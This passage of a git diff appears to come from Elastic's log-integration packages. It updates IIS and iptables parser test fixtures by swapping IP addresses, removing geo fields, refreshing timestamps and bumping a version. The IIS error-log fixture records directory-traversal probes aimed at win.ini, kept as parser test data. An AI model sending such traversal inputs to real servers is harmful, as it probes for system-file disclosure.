Gecko) Chrome/67.43.156.13 Safari/537.36", "os": { "name": "Windows", "version": "10", @@ -219,7 +219,7 @@ "device": { "name": "Other" }, - "version": "85.0.4183.121" + "version": "67.43.156.13" } }, { @@ -271,8 +271,8 @@ }, "event": { "duration": 32000000, - "ingested": "2021-06-09T11:14:32.323401200Z", - "original": "2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLAPAprvMaster $filter=BatchId%20eq%20%27FY21HSNG0820%27\u0026$orderby=Subsys,Ref\u0026$skip=0\u0026$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23", + "ingested": "2021-12-09T13:39:36.546192Z", + "original": "2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLAPAprvMaster $filter=BatchId%20eq%20%27FY21HSNG0820%27\u0026$orderby=Subsys,Ref\u0026$skip=0\u0026$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 32 192.168.198.23", "kind": "event", "category": [ "web", @@ -285,7 +285,7 @@ }, "user_agent": { "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36", "os": { "name": "Windows", "version": "10", @@ -294,7 +294,7 @@ "device": { "name": "Other" }, - "version": "85.0.4183.121" + "version": "67.43.156.13" } }, { @@ -346,8 +346,8 @@ }, "event": { "duration": 166000000, - "ingested": "2021-06-09T11:14:32.323405100Z", - "original": "2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLATrnsDetail $filter=Subsys%20eq%20%27JE%27%20and%20Ref%20eq%20%27HSNG08-MR%27%20and%20BatchId%20eq%20%27FY21HSNG0820%27\u0026$orderby=RecNo\u0026$skip=0\u0026$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 166 192.168.198.23", + "ingested": "2021-12-09T13:39:36.546201100Z", + "original": "2020-10-07 23:00:17 192.168.16.11 GET /Production-UI/data/finance/legacy/GLATrnsDetail $filter=Subsys%20eq%20%27JE%27%20and%20Ref%20eq%20%27HSNG08-MR%27%20and%20BatchId%20eq%20%27FY21HSNG0820%27\u0026$orderby=RecNo\u0026$skip=0\u0026$top=20 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 166 192.168.198.23", "kind": "event", "category": [ "web", @@ -360,7 +360,7 @@ }, "user_agent": { "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36", "os": { "name": "Windows", "version": "10", @@ -369,7 +369,7 @@ "device": { "name": "Other" }, - "version": "85.0.4183.121" + "version": "67.43.156.13" } }, { @@ -420,8 +420,8 @@ }, "event": { "duration": 60000000, - "ingested": "2021-06-09T11:14:32.323408800Z", - "original": "2020-10-07 23:06:42 192.168.16.11 GET /Production-UI/api/finance/legacy/documents/PendingAttachments/GLJEUB - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 60 192.168.198.23", + "ingested": "2021-12-09T13:39:36.546217700Z", + "original": "2020-10-07 23:06:42 192.168.16.11 GET /Production-UI/api/finance/legacy/documents/PendingAttachments/GLJEUB - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 60 192.168.198.23", "kind": "event", "category": [ "web", @@ -434,7 +434,7 @@ }, "user_agent": { "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36", "os": { "name": "Windows", "version": "10", @@ -443,7 +443,7 @@ "device": { "name": "Other" }, - "version": "85.0.4183.121" + "version": "67.43.156.13" } }, { @@ -494,8 +494,8 @@ }, "event": { "duration": 72000000, - "ingested": "2021-06-09T11:14:32.323412900Z", - "original": "2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLATrnsDetail/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 72 192.168.198.23", + "ingested": "2021-12-09T13:39:36.546240Z", + "original": "2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLATrnsDetail/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 72 192.168.198.23", "kind": "event", "category": [ "web", @@ -508,7 +508,7 @@ }, "user_agent": { "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36", "os": { "name": "Windows", "version": "10", @@ -517,7 +517,7 @@ "device": { "name": "Other" }, - "version": "85.0.4183.121" + "version": "67.43.156.13" } }, { @@ -568,8 +568,8 @@ }, "event": { "duration": 88000000, - "ingested": "2021-06-09T11:14:32.323416800Z", - "original": "2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLAPAprvMaster/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 88 192.168.198.23", + "ingested": "2021-12-09T13:39:36.546248800Z", + "original": "2020-10-07 23:06:42 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/GLAPAprvMaster/attachments/ - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 88 192.168.198.23", "kind": "event", "category": [ "web", @@ -582,7 +582,7 @@ }, "user_agent": { "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36", "os": { "name": "Windows", "version": "10", @@ -591,7 +591,7 @@ "device": { "name": "Other" }, - "version": "85.0.4183.121" + "version": "67.43.156.13" } }, { @@ -642,8 +642,8 @@ }, "event": { "duration": 286000000, - "ingested": "2021-06-09T11:14:32.323427300Z", - "original": "2020-10-07 23:07:02 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/attachDoc - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/85.0.4183.121+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 286 192.168.198.23", + "ingested": "2021-12-09T13:39:36.546255Z", + "original": "2020-10-07 23:07:02 192.168.16.11 POST /Production-UI/api/finance/legacy/documents/attachDoc - 443 - 192.168.7.63 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.43.156.13+Safari/537.36 https://onesolfarm.ggcity.org/Production-UI/ui/uiscreens/generalledger/GLJEUB 200 0 0 286 192.168.198.23", "kind": "event", "category": [ "web", @@ -656,7 +656,7 @@ }, "user_agent": { "name": "Chrome", - "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.43.156.13 Safari/537.36", "os": { "name": "Windows", "version": "10", @@ -665,7 +665,7 @@ "device": { "name": "Other" }, - "version": "85.0.4183.121" + "version": "67.43.156.13" } } ] diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log index 21158a4d4e6..32b301c2743 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log @@ -1,4 +1,4 @@ 2018-01-01 08:09:10 172.31.77.6 2094 172.31.77.6 80 HTTP/1.1 GET /qos/1kbfile.txt 503 - ConnLimit - -2018-01-01 09:10:11 85.181.35.98 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname - -2018-01-01 10:11:12 85.181.35.98 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S - -2018-01-01 11:12:13 85.181.35.98 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond - +2018-01-01 09:10:11 67.43.156.13 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname - +2018-01-01 10:11:12 67.43.156.13 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S - +2018-01-01 11:12:13 67.43.156.13 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond - diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json index 6826d7c8f9f..567c09487cc 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error-72.log-expected.json @@ -44,7 +44,7 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.576466500Z", + "ingested": "2021-12-09T13:39:38.169719300Z", "original": "2018-01-01 08:09:10 172.31.77.6 2094 172.31.77.6 80 HTTP/1.1 GET /qos/1kbfile.txt 503 - ConnLimit -", "category": [ "web", @@ -64,27 +64,9 @@ "ip": "127.0.0.1" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", - "location": { - "lon": 13.4531, - "lat": 52.4473 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "85.181.35.98", "port": 2780, - "ip": "85.181.35.98" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/ThisIsMyUrl.htm", @@ -105,7 +87,7 @@ }, "related": { "ip": [ - "85.181.35.98", + "67.43.156.13", "127.0.0.1" ] }, @@ -119,8 +101,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.576489Z", - "original": "2018-01-01 09:10:11 85.181.35.98 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname -", + "ingested": "2021-12-09T13:39:38.169724100Z", + "original": "2018-01-01 09:10:11 67.43.156.13 2780 127.0.0.1 80 HTTP/1.1 GET /ThisIsMyUrl.htm 400 - Hostname -", "category": [ "web", "network" @@ -139,27 +121,9 @@ "ip": "127.0.0.1" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", - "location": { - "lon": 13.4531, - "lat": 52.4473 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "85.181.35.98", "port": 2894, - "ip": "85.181.35.98" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "url": { "path": "/", @@ -179,7 +143,7 @@ }, "related": { "ip": [ - "85.181.35.98", + "67.43.156.13", "127.0.0.1" ] }, @@ -193,8 +157,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.576494100Z", - "original": "2018-01-01 10:11:12 85.181.35.98 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S -", + "ingested": "2021-12-09T13:39:38.169727800Z", + "original": "2018-01-01 10:11:12 67.43.156.13 2894 127.0.0.1 80 HTTP/2.0 GET / 505 - Version_N/S -", "category": [ "web", "network" @@ -218,7 +182,7 @@ }, "related": { "ip": [ - "85.181.35.98", + "67.43.156.13", "127.0.0.1" ] }, @@ -228,31 +192,13 @@ "ip": "127.0.0.1" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "DE-BE", - "city_name": "Berlin", - "country_iso_code": "DE", - "country_name": "Germany", - "region_name": "Land Berlin", - "location": { - "lon": 13.4531, - "lat": 52.4473 - } - }, - "as": { - "number": 6805, - "organization": { - "name": "Telefonica Germany" - } - }, - "address": "85.181.35.98", "port": 64388, - "ip": "85.181.35.98" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T11:14:32.576498500Z", - "original": "2018-01-01 11:12:13 85.181.35.98 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond -", + "ingested": "2021-12-09T13:39:38.169731300Z", + "original": "2018-01-01 11:12:13 67.43.156.13 64388 127.0.0.1 80 - - - - - Timer_MinBytesPerSecond -", "category": [ "web", "network" diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log index 12b3262a924..eea55dbb221 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log @@ -1,8 +1,8 @@ -2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL - -2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL - -2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /..\pixfir~1\how_to_login.html 403 - Forbidden - -2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET ..\..\..\..\..\..\winnt\win.ini 400 - URL - -2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /�.�./�.�./�.�./�.�./�.�./windows/win.ini 404 - NotFound - -2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\..\..\..\..\..\..\winnt\win.ini 403 - Forbidden - -2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound - -2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /fee&fie=foe 400 - URL - +2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL - +2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL - +2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /..\pixfir~1\how_to_login.html 403 - Forbidden - +2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET ..\..\..\..\..\..\winnt\win.ini 400 - URL - +2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /�.�./�.�./�.�./�.�./�.�./windows/win.ini 404 - NotFound - +2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\..\..\..\..\..\..\winnt\win.ini 403 - Forbidden - +2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound - +2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /fee&fie=foe 400 - URL - diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json index 70deaa9f2af..8d04eec0d0a 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-iis-error.log-expected.json @@ -7,18 +7,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "path": "12.2.1", @@ -39,7 +30,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, @@ -53,8 +44,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638704300Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL -", + "ingested": "2021-12-09T13:39:38.462543700Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/0.9 t3 12.2.1 400 - URL -", "category": [ "web", "network" @@ -73,18 +64,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "path": "./././././../../../../../../../../", @@ -105,7 +87,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, @@ -119,8 +101,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638723600Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL -", + "ingested": "2021-12-09T13:39:38.462553Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET ./././././../../../../../../../../ 400 - URL -", "category": [ "web", "network" @@ -139,18 +121,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "original": "/..\\pixfir~1\\how_to_login.html" @@ -169,7 +142,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, @@ -183,8 +156,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638728700Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /..\\pixfir~1\\how_to_login.html 403 - Forbidden -", + "ingested": "2021-12-09T13:39:38.462558900Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /..\\pixfir~1\\how_to_login.html 403 - Forbidden -", "category": [ "web", "network" @@ -203,18 +176,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "original": "..\\..\\..\\..\\..\\..\\winnt\\win.ini" @@ -233,7 +197,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, @@ -247,8 +211,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638732800Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini 400 - URL -", + "ingested": "2021-12-09T13:39:38.462564400Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET ..\\..\\..\\..\\..\\..\\winnt\\win.ini 400 - URL -", "category": [ "web", "network" @@ -267,18 +231,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "path": "/�.�./�.�./�.�./�.�./�.�./windows/win.ini", @@ -299,7 +254,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, @@ -313,8 +268,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638736600Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /�.�./�.�./�.�./�.�./�.�./windows/win.ini 404 - NotFound -", + "ingested": "2021-12-09T13:39:38.462569800Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /�.�./�.�./�.�./�.�./�.�./windows/win.ini 404 - NotFound -", "category": [ "web", "network" @@ -333,18 +288,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "original": "/nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini" @@ -363,7 +309,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, @@ -377,8 +323,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638740100Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini 403 - Forbidden -", + "ingested": "2021-12-09T13:39:38.462575200Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /nessus\\..\\..\\..\\..\\..\\..\\winnt\\win.ini 403 - Forbidden -", "category": [ "web", "network" @@ -397,18 +343,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "path": "*", @@ -428,7 +365,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, @@ -442,8 +379,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638744Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound -", + "ingested": "2021-12-09T13:39:38.462580600Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 OPTIONS * 404 - NotFound -", "category": [ "web", "network" @@ -462,18 +399,9 @@ "ip": "192.168.101.101" }, "source": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "149.42.83.135", "port": 12345, - "ip": "149.42.83.135" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "url": { "path": "/fee\u0026fie=foe", @@ -493,7 +421,7 @@ }, "related": { "ip": [ - "149.42.83.135", + "67.43.156.15", "192.168.101.101" ] }, @@ -507,8 +435,8 @@ } }, "event": { - "ingested": "2021-06-09T11:14:32.638747400Z", - "original": "2018-05-05 05:05:55 149.42.83.135 12345 192.168.101.101 443 HTTP/1.1 GET /fee\u0026fie=foe 400 - URL -", + "ingested": "2021-12-09T13:39:38.462586Z", + "original": "2018-05-05 05:05:55 67.43.156.15 12345 192.168.101.101 443 HTTP/1.1 GET /fee\u0026fie=foe 400 - URL -", "category": [ "web", "network" diff --git a/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json b/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json index 92d66688b84..5b5975e1200 100644 --- a/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json +++ b/packages/iis/data_stream/error/_dev/test/pipeline/test-ipv6-zone-id.log-expected.json @@ -27,7 +27,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-06-09T11:14:32.755546700Z", + "ingested": "2021-12-09T13:39:39.018996800Z", "original": "2018-12-30 14:22:07 ::1%0 49958 ::1%0 80 - - - - - - Timer_ConnectionIdle -", "category": [ "web", diff --git a/packages/iis/manifest.yml b/packages/iis/manifest.yml index fe1f5f24b3b..4f39fce9252 100644 --- a/packages/iis/manifest.yml +++ b/packages/iis/manifest.yml @@ -1,6 +1,6 @@ name: iis title: IIS -version: 0.8.0 +version: 0.8.1 description: Collect logs and metrics from Internet Information Services (IIS) servers with Elastic Agent. type: integration icons: diff --git a/packages/iptables/_dev/deploy/docker/sample_logs/iptables-syslog.log b/packages/iptables/_dev/deploy/docker/sample_logs/iptables-syslog.log index 9cfc3a9c2f3..e69869eafa7 100644 --- a/packages/iptables/_dev/deploy/docker/sample_logs/iptables-syslog.log +++ b/packages/iptables/_dev/deploy/docker/sample_logs/iptables-syslog.log @@ -1,2 +1,2 @@ -<161>Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 -<6>2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 \ No newline at end of file +<161>Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 +<6>2021-03-12T14:10:18Z Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=67.43.156.15 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 RES=0x00 ACK URGP=0 \ No newline at end of file diff --git a/packages/iptables/_dev/deploy/docker/sample_logs/iptables.log b/packages/iptables/_dev/deploy/docker/sample_logs/iptables.log index 569f8acb87f..5c0ab0ba384 100644 --- a/packages/iptables/_dev/deploy/docker/sample_logs/iptables.log +++ b/packages/iptables/_dev/deploy/docker/sample_logs/iptables.log @@ -1,20 +1,20 @@ -Oct 10 07:25:12 Hostname kernel: [wan-lan-default-D]IN=eth0 OUT= MAC=90:10:20:76:8d:20:90:10:65:29:b6:2a:08:00 SRC=158.109.0.1 DST=10.4.0.5 LEN=52 TOS=0x00 PREC=0x00 TTL=63 ID=0 DF PROTO=TCP SPT=38842 DPT=443 WINDOW=2853 